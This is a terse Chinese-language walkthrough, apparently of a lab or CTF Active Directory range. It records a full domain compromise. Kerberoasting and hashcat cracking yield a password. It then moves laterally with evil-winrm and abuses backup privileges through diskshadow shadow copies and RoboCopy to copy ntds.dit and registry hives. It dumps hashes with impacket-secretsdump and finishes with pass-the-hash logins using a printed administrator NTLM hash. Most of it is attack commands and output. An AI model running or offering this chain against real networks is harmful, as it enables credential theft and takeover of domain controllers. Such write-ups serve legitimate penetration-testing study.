$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$bf879e774759456daf103777ad9af90d$4a4de18d66ea3c67bae2249d6f7111fb129dc414e16f7919032694689c5dfa24d6812ccb0bd2b41adf6750d65c0b463f8fec3dea3102dbb2aec81bd4709e5d8220f10170f25b40706c3595c26c9270e3ee74c55a2c3bf8a331afb9f258b56c75a33d4d1eb917a5f42ccb0e314038fe0d81a939f87514722111263df070a8add429e99817cc568e6dd7a8631f054fd844048adf050bfb1deb50634bdd55942225f10b79d6996d781a5027b36c951ff207ca0d1d14b90d1e7d6542abb7930a311bdf3c70711819f503d8b7e1177017299b8d594efbb7453ff63b7e834192896905ad9dcf2d56d62f9882b96b4eebf111bc719ba3dfda365b9e8b4066a3a8f04453f54f5fab6278c7e8ddff61f26cb6040baac01e7831390c3eafc26c8cda1064bb5a315c2224bc891a88f9db904861f1085e7d899720599936c9027b05f5198e3f0fea64e2920be2e8dbc97735667104e7d60658c178c5721433e9a2270ed2b5c5f66364da1778d8a790075cd069d74af8a44a78dd0888792a737fbbde5350120ff962e4925688177b47bec14762c24adb311506a7ac0f23ee5e780828f953c84c8629380755777f439a183cbc803d7f53f6715ea0603f6720f7035fcb931b51405f31d444a4a54978c0b9827ff41f0a47d97ba6547d3e2ff3dfabab9d7d276f7dd757fa1b706cfbf377d77d35d24023f32686944faf69d1aedf00e786ee01b85fd8adfc0f8d8c25fb4e0f58780a0290e45a40f5cf75a0af127b9d9481a92f78926a9498deea1e9f60c9216cb806a409718501bee7841dd4267ef636c37f1f17454a71c5f67555df6bbb5f2d947ff79090713e3155bdfef57c117940a48db78089b6be20903fe6d66426f839332a3ba209e5503cff4881d5c98573b7639ba9ed68f64d073a3d095694a19c08bfc9ca9efcc2dd9fbac00dea0c892f576a73132d705d4ff6f370098bb6cdd5986af2fc7d201431561476ddef1df74c8915943cf014c4c41e201025445898eded8720a9376da287a297ff8ab2a8f349ebff00724a5c5fd421103002a7b1581f4d687b07287c64d504ab4e884e362ced5cfa772c5a6bd6eb3e427a988f10cc6a3cecfd635a1b71a4a2005221733aeb5b69174253c08b6dd38468278ed4f28fc2a70f6c0aad0f6148c5a7456512669677b42ae75cf6612709f93ba69b994e8c6d806d9dbe2b90f9a91f7f412b9759ecb07eec4d5d94b089af36ecabc8bb11209d880b41c766bc043d59c3733871d6ce2b836392cab76082624633167e1604756d47a84c36fe3833341f6abc9a25fefb5e125128c3e5b96df7b6427ee246d6015c976988c8799934d961f5ffa780f5eb586c15f8de35a90637d568b4f47dff3aa864489d28cbfb61a0b7f8106cde05160ae36549589b72f74a59bf70942ae81e1a78b92abf7b32232b0496481dc0d9cb0c931613bd2ade64073f1f90760e7b4b977d71cdfeb0c2aebf14c62d
爆破一下
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force
DPQSXSXgh2
拿到密码,直接横向
evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
登录到域控
有备份以及还原文件或目录的权限,可以卷影拷贝然后读sam(SAM是安全账户管理器数据库,包含了本地用户及用户组,包括它们的口令及其他属性,位于注册表的HKLM__SAM下面)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
上传一个文件
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
转成windows格式 unix2dos raj.dsh
然后再上传
upload /home/kali/copy_website/raj.dsh
diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上: XR-DC,2024/4/19 17:36:04
-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b} 的别名 raj 设置为环境变量。
已将卷影集 ID {fe1ac6e2-a342-4889-bef1-09aa8825f758} 的别名 VSS_SHADOW_SET 设置为环境变量。
正在查询卷影副本集 ID 为 {fe1ac6e2-a342-4889-bef1-09aa8825f758} 的所有卷影副本
* 卷影副本 ID = {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b} %raj%
- 卷影副本集: {fe1ac6e2-a342-4889-bef1-09aa8825f758} %VSS_SHADOW_SET%
- 卷影副本原始数 = 1
- 原始卷名称: \\?\Volume{4790f32e-0000-0000-0000-100000000000}\ [C:\]
- 创建时间: 2024/4/19 17:36:05
- 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- 原始计算机: XR-DC.xiaorang.lab
- 服务计算机: XR-DC.xiaorang.lab
- 未暴露
- 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- 属性: No_Auto_Release Persistent No_Writers Differential
已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b}
已成功将卷影副本暴露为 z:\。
->
复制到当前目录
RoboCopy /b z:\windows\ntds . ntds.dit
impacket-secretsdump -ntds ntds.dit -system system local
proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277
拿下域控,这期考的都是privilege
p4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277 [email protected] -codec gbk